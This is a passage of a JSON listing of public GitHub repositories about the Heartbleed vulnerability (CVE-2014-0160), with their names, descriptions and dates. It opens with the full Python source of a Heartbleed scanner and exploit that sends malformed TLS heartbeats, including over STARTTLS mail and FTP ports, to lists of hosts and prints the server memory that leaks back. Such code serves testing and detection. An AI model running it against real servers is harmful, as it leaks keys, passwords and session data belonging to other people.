SMTP\/POP\/IMAP\/FTP\/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action=\"store_true\", dest=\"verbose\", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) \t#print ' %04x: %-48s %s' % (b, hxdat, pdat) \tpdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print \"Error receiving data: \", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp\/pop3\/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls\/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send(\"EHLO someone.org\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if pop3\/imap supports starttls\/stls elif port in {110, 143}: print 'POP3\/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send(\"CAPA\\n\") if port == 143: s.send(\"CAPABILITY\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"STLS\" in check: opts.starttls = True stls = True print \"STLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # check if ftp supports auth tls\/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send(\"FEAT\\n\") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if \"STARTTLS\" in check: opts.starttls = True print \"STARTTLS command found\" elif \"AUTH TLS\" in check: opts.starttls = True atls = True print \"AUTH TLS command found\" else: print \"STARTTLS command NOT found!\" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send(\"STLS\\n\") elif atls: print 'Sending AUTH TLS Command...' s.send(\"AUTH TLS\\n\") else: print 'Sending STARTTLS Command...' s.send(\"STARTTLS\\n\") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print \"Error connecting to host: \", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, \"r\") for line in fileIN: targetinfo = line.strip().split(\":\") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()", "fork": false, "created_at": "2015-04-05T22:03:30Z", "updated_at": "2020-05-28T14:44:33Z", "pushed_at": "2015-04-05T22:03:31Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 35284258, "name": "heartbleed", "full_name": "iSCInc\/heartbleed", "owner": { "login": "iSCInc", "id": 6920447, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6920447?v=4", "html_url": "https:\/\/github.com\/iSCInc", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/iSCInc\/heartbleed", "description": "A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..", "fork": false, "created_at": "2015-05-08T14:37:44Z", "updated_at": "2015-05-15T13:19:04Z", "pushed_at": "2015-05-15T13:20:41Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 37109043, "name": "cve-2014-0160-Yunfeng-Jiang", "full_name": "marstornado\/cve-2014-0160-Yunfeng-Jiang", "owner": { "login": "marstornado", "id": 1574834, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1574834?v=4", "html_url": "https:\/\/github.com\/marstornado", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/marstornado\/cve-2014-0160-Yunfeng-Jiang", "description": null, "fork": false, "created_at": "2015-06-09T03:55:14Z", "updated_at": "2015-06-09T04:03:10Z", "pushed_at": "2015-06-09T04:14:11Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 38980774, "name": "vaas-cve-2014-0160", "full_name": "hmlio\/vaas-cve-2014-0160", "owner": { "login": "hmlio", "id": 11684719, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11684719?v=4", "html_url": "https:\/\/github.com\/hmlio", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hmlio\/vaas-cve-2014-0160", "description": "Vulnerability as a service: showcasing CVS-2014-0160, a.k.a. Heartbleed", "fork": false, "created_at": "2015-07-12T22:40:54Z", "updated_at": "2024-07-14T13:03:17Z", "pushed_at": "2019-10-08T10:03:04Z", "stargazers_count": 15, "watchers_count": 15, "has_discussions": false, "forks_count": 8, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 8, "watchers": 15, "score": 0, "subscribers_count": 2 }, { "id": 43054972, "name": "heartbleedscanner", "full_name": "hybridus\/heartbleedscanner", "owner": { "login": "hybridus", "id": 5206389, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5206389?v=4", "html_url": "https:\/\/github.com\/hybridus", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hybridus\/heartbleedscanner", "description": "Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) ", "fork": false, "created_at": "2015-09-24T08:39:28Z", "updated_at": "2024-08-12T19:19:25Z", "pushed_at": "2015-09-24T16:15:11Z", "stargazers_count": 11, "watchers_count": 11, "has_discussions": false, "forks_count": 11, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 11, "watchers": 11, "score": 0, "subscribers_count": 3 }, { "id": 44786613, "name": "Heartbleed_Dockerfile_with_Nginx", "full_name": "froyo75\/Heartbleed_Dockerfile_with_Nginx", "owner": { "login": "froyo75", "id": 8553697, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8553697?v=4", "html_url": "https:\/\/github.com\/froyo75", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/froyo75\/Heartbleed_Dockerfile_with_Nginx", "description": "Dockerfile for testing CVE-2014-0160 Heartbleed exploitation.", "fork": false, "created_at": "2015-10-23T02:42:30Z", "updated_at": "2023-03-13T22:49:12Z", "pushed_at": "2021-08-28T22:10:26Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 51847934, "name": "CVE-2014-0160-Chrome-Plugin", "full_name": "Xyl2k\/CVE-2014-0160-Chrome-Plugin", "owner": { "login": "Xyl2k", "id": 8536299, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8536299?v=4", "html_url": "https:\/\/github.com\/Xyl2k", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Xyl2k\/CVE-2014-0160-Chrome-Plugin", "description": "Heartbleed", "fork": false, "created_at": "2016-02-16T15:49:55Z", "updated_at": "2021-06-17T17:01:26Z", "pushed_at": "2016-02-16T16:04:33Z", "stargazers_count": 1, "watchers_count": 1, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 1, "score": 0, "subscribers_count": 3 }, { "id": 156641077, "name": "OpenSSL-HeartBleed-CVE-2014-0160-PoC", "full_name": "caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC", "owner": { "login": "caiqiqi", "id": 8278315, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8278315?v=4", "html_url": "https:\/\/github.com\/caiqiqi", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/caiqiqi\/OpenSSL-HeartBleed-CVE-2014-0160-PoC", "description": "来自:https:\/\/www.freebuf.com\/articles\/web\/31700.html", "fork": false, "created_at": "2018-11-08T02:50:28Z", "updated_at": "2018-11-08T02:51:58Z", "pushed_at": "2018-11-08T02:51:56Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 4, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 4, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 161246011, "name": "HeartBleed", "full_name": "Saymeis\/HeartBleed", "owner": { "login": "Saymeis", "id": 42687972, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42687972?v=4", "html_url": "https:\/\/github.com\/Saymeis", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Saymeis\/HeartBleed", "description": "CVE-2014-0160", "fork": false, "created_at": "2018-12-10T22:42:51Z", "updated_at": "2019-07-31T23:10:49Z", "pushed_at": "2019-05-19T15:13:33Z", "stargazers_count": 1, "watchers_count": 1, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 1, "score": 0, "subscribers_count": 0 }, { "id": 164344882, "name": "cve-2014-0160", "full_name": "cved-sources\/cve-2014-0160", "owner": { "login": "cved-sources", "id": 46423677, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", "html_url": "https:\/\/github.com\/cved-sources", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cved-sources\/cve-2014-0160", "description": "cve-2014-0160", "fork": false, "created_at": "2019-01-06T20:57:53Z", "updated_at": "2021-04-15T21:08:31Z", "pushed_at": "2021-04-15T20:57:26Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 2, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 2, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 172987767, "name": "heartbleed", "full_name": "cheese-hub\/heartbleed", "owner": { "login": "cheese-hub", "id": 41589726, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41589726?v=4", "html_url": "https:\/\/github.com\/cheese-hub", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cheese-hub\/heartbleed", "description": "Demonstration of the Heartbleed Bug CVE-2014-0160", "fork": false, "created_at": "2019-02-27T20:46:41Z", "updated_at": "2024-11-03T03:56:30Z", "pushed_at": "2019-06-27T13:00:11Z", "stargazers_count": 1, "watchers_count": 1, "has_discussions": false, "forks_count": 3, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 3, "watchers": 1, "score": 0, "subscribers_count": 4 }, { "id": 179123466, "name": "cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS", "full_name": "artofscripting-zz\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS", "owner": { "login": "artofscripting-zz", "id": 1545672, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1545672?v=4", "html_url": "https:\/\/github.com\/artofscripting-zz", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/artofscripting-zz\/cmty-ssl-heartbleed-CVE-2014-0160-HTTP-HTTPS", "description": null, "fork": false, "created_at": "2019-04-02T17:08:01Z", "updated_at": "2019-04-02T18:11:08Z", "pushed_at": "2019-04-02T18:11:07Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 179373566, "name": "heartbleed-bug", "full_name": "cldme\/heartbleed-bug", "owner": { "login": "cldme", "id": 10621824, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10621824?v=4", "html_url": "https:\/\/github.com\/cldme", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cldme\/heartbleed-bug", "description": "Example and demo setup for Heartbleed vulnerability (CVE-2014-0160). This should be used for testing purposes only!💔", "fork": false, "created_at": "2019-04-03T21:32:50Z", "updated_at": "2019-04-10T16:42:44Z", "pushed_at": "2019-04-10T16:42:43Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 200631397, "name": "Heartexploit", "full_name": "ThanHuuTuan\/Heartexploit", "owner": { "login": "ThanHuuTuan", "id": 32167814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32167814?v=4", "html_url": "https:\/\/github.com\/ThanHuuTuan", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ThanHuuTuan\/Heartexploit", "description": "Aquí está mi nuevo y primer exploit web, este exploit ataca a la vulnerabilidad de HeartBleed (CVE-2014-0160) espero que os guste.", "fork": false, "created_at": "2019-08-05T10:09:44Z", "updated_at": "2020-08-22T02:07:50Z", "pushed_at": "2018-05-07T19:11:20Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 277099398, "name": "heartbleed", "full_name": "rouze-d\/heartbleed", "owner": { "login": "rouze-d", "id": 50823809, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50823809?v=4", "html_url": "https:\/\/github.com\/rouze-d", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rouze-d\/heartbleed", "description": "Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL\/TLS versions)", "fork": false, "created_at": "2020-07-04T11:46:51Z", "updated_at": "2020-07-04T12:12:06Z", "pushed_at": "2020-07-04T12:12:04Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 319993085, "name": "CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed", "full_name": "WildfootW\/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed", "owner": { "login": "WildfootW", "id": 11520473, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11520473?v=4", "html_url": "https:\/\/github.com\/WildfootW", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/WildfootW\/CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed", "description": null, "fork": false, "created_at": "2020-12-09T15:08:21Z", "updated_at": "2020-12-09T15:08:56Z", "pushed_at": "2020-12-09T15:08:53Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 321147840, "name": "heartbleed", "full_name": "GuillermoEscobero\/heartbleed", "owner": { "login": "GuillermoEscobero", "id": 15904345, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15904345?v=4", "html_url": "https:\/\/github.com\/GuillermoEscobero", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GuillermoEscobero\/heartbleed", "description": "CVE-2014-0160 OpenSSL Heartbleed Proof of Concept", "fork": false, "created_at": "2020-12-13T19:53:50Z", "updated_at": "2021-11-08T14:48:58Z", "pushed_at": "2020-12-14T19:15:20Z", "stargazers_count": 2, "watchers_count": 2, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 2, "score": 0, "subscribers_count": 2 }, { "id": 325974459, "name": "A2SV--SSL-VUL-Scan", "full_name": "anthophilee\/A2SV--SSL-VUL-Scan", "owner": { "login": "anthophilee", "id": 75995332, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75995332?v=4", "html_url": "https:\/\/github.com\/anthophilee", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/anthophilee\/A2SV--SSL-VUL-Scan", "description": "A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https:\/\/github.com\/hahwul\/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device", "fork": false, "created_at": "2021-01-01T12:26:08Z", "updated_at": "2025-01-04T11:54:28Z", "pushed_at": "2021-01-01T12:26:10Z", "stargazers_count": 4, "watchers_count": 4, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 4, "score": 0, "subscribers_count": 1 }, { "id": 338782923, "name": "heartpatch.us", "full_name": "ingochris\/heartpatch.us", "owner": { "login": "ingochris", "id": 2686679, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2686679?v=4", "html_url": "https:\/\/github.com\/ingochris", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ingochris\/heartpatch.us", "description": "OpenSSL Heartbleed Bug CVE-2014-0160 Toolkit. Built with ❤ by Christopher Ngo.", "fork": false, "created_at": "2021-02-14T10:48:56Z", "updated_at": "2021-04-21T17:06:57Z", "pushed_at": "2021-02-14T13:34:18Z", "stargazers_count": 3, "watchers_count": 3, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [ "detection", "exploit", "heartbleed", "patch" ], "visibility": "public", "forks": 0, "watchers": 3, "score": 0, "subscribers_count": 1 }, { "id": 353005718, "name": "heartbleed", "full_name": "belmind\/heartbleed", "owner": { "login": "belmind", "id": 22224799, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22224799?v=4", "html_url": "https:\/\/github.com\/belmind", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/belmind\/heartbleed", "description": "A collection of scripts and instructions to test CVE-2014-0160 (heartbleed). ❤️ 🩸", "fork": false, "created_at": "2021-03-30T13:11:26Z", "updated_at": "2022-05-26T08:11:24Z", "pushed_at": "2021-05-20T13:28:44Z", "stargazers_count": 2, "watchers_count": 2, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [ "heartbleed" ], "visibility": "public", "forks": 0, "watchers": 2, "score": 0, "subscribers_count": 2 }, { "id": 396322717, "name": "bleeding-heart", "full_name": "pierceoneill\/bleeding-heart", "owner": { "login": "pierceoneill", "id": 37594104, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37594104?v=4", "html_url": "https:\/\/github.com\/pierceoneill", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pierceoneill\/bleeding-heart", "description": "The Heartbleed bug `CVE-2014-0160` is a severe implementation flaw in the OpenSSL library, which enables attackers to steal data from the memory of the victim server. The contents of the stolen data depend on what is there in the memory of the server. It could potentially contain private keys, TLS session keys, usernames, passwords, credit cards, etc. The vulnerability is in the implementation of the Heartbeat protocol, which is used by SSL\/TLS to keep the connection alive.", "fork": false, "created_at": "2021-08-15T11:05:23Z", "updated_at": "2021-08-15T11:13:05Z", "pushed_at": "2021-08-15T11:13:02Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 485013657, "name": "CVE-2014-0160_Heartbleed", "full_name": "n3rdh4x0r\/CVE-2014-0160_Heartbleed", "owner": { "login": "n3rdh4x0r", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", "html_url": "https:\/\/github.com\/n3rdh4x0r", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/n3rdh4x0r\/CVE-2014-0160_Heartbleed", "description": null, "fork": false, "created_at": "2022-04-24T11:53:16Z", "updated_at": "2022-10-25T16:16:14Z", "pushed_at": "2022-04-24T11:54:23Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 489531253, "name": "fuzzing", "full_name": "GardeniaWhite\/fuzzing", "owner": { "login": "GardeniaWhite", "id": 50975594, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50975594?v=4", "html_url": "https:\/\/github.com\/GardeniaWhite", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GardeniaWhite\/fuzzing", "description": "fuzzing with libFuzzer,inlude openssl heartbleed (CVE-2014-0160)", "fork": false, "created_at": "2022-05-07T00:52:46Z", "updated_at": "2024-07-25T07:48:10Z", "pushed_at": "2022-05-07T05:51:40Z", "stargazers_count": 2, "watchers_count": 2, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 2, "score": 0, "subscribers_count": 1 }, { "id": 585686482, "name": "heartbleed-proof-of-concept", "full_name": "undacmic\/heartbleed-proof-of-concept", "owner": { "login": "undacmic", "id": 46650582, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46650582?v=4", "html_url": "https:\/\/github.com\/undacmic", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/undacmic\/heartbleed-proof-of-concept", "description": "Proof of concept for exploiting the Heartbeat Extension bug detailed in the CVE-2014-0160. :old_key: :unlock:", "fork": false, "created_at": "2023-01-05T20:09:38Z", "updated_at": "2024-12-22T15:13:45Z", "pushed_at": "2023-01-18T20:36:53Z", "stargazers_count": 5, "watchers_count": 5, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [ "cve-2014-0160", "exploit", "heartbeat", "heartbleed", "proof-of-concept", "tls", "vulnerability" ], "visibility": "public", "forks": 0, "watchers": 5, "score": 0, "subscribers_count": 2 }, { "id": 632561462, "name": "heartbleed-checker", "full_name": "cbk914\/heartbleed-checker", "owner": { "login": "cbk914", "id": 2042196, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2042196?v=4", "html_url": "https:\/\/github.com\/cbk914", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cbk914\/heartbleed-checker", "description": "Check for CVE-2014-0160 ", "fork": false, "created_at": "2023-04-25T17:00:25Z", "updated_at": "2024-05-17T14:26:04Z", "pushed_at": "2024-05-17T14:26:00Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 634550740, "name": "CVE-2014-0160-Chrome-Plugin", "full_name": "MrE-Fog\/CVE-2014-0160-Chrome-Plugin", "owner": { "login": "MrE-Fog", "id": 114317320, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114317320?v=4", "html_url": "https:\/\/github.com\/MrE-Fog", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MrE-Fog\/CVE-2014-0160-Chrome-Plugin", "description": null, "fork": false, "created_at": "2023-04-30T13:56:47Z", "updated_at": "2023-04-30T13:56:47Z", "pushed_at": "2023-04-30T13:57:17Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 2 }, { "id": 672705203, "name": "cve-2014-0160-heartbleed", "full_name": "timsonner\/cve-2014-0160-heartbleed", "owner": { "login": "timsonner", "id": 66705347, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66705347?v=4", "html_url": "https:\/\/github.com\/timsonner", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/timsonner\/cve-2014-0160-heartbleed", "description": null, "fork": false, "created_at": "2023-07-31T01:12:02Z", "updated_at": "2023-07-31T01:13:29Z", "pushed_at": "2023-07-31T01:13:26Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 1, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 1, "watchers": 0, "score": 0, "subscribers_count": 1 }, { "id": 860467967, "name": "CVE-2014-0160-HeartBleed", "full_name": "Yash-Thakkar77\/CVE-2014-0160-HeartBleed", "owner": { "login": "Yash-Thakkar77", "id": 117845673, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117845673?v=4", "html_url": "https:\/\/github.com\/Yash-Thakkar77", "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Yash-Thakkar77\/CVE-2014-0160-HeartBleed", "description": null, "fork": false, "created_at": "2024-09-20T13:44:54Z", "updated_at": "2024-09-20T13:58:28Z", "pushed_at": "2024-09-20T13:58:25Z", "stargazers_count": 0, "watchers_count": 0, "has_discussions": false, "forks_count": 0, "allow_forking": true, "is_template": false, "web_commit_signoff_required": false, "topics": [], "visibility": "public", "forks": 0, "watchers": 0, "score": 0, "subscribers_count": 1 } ]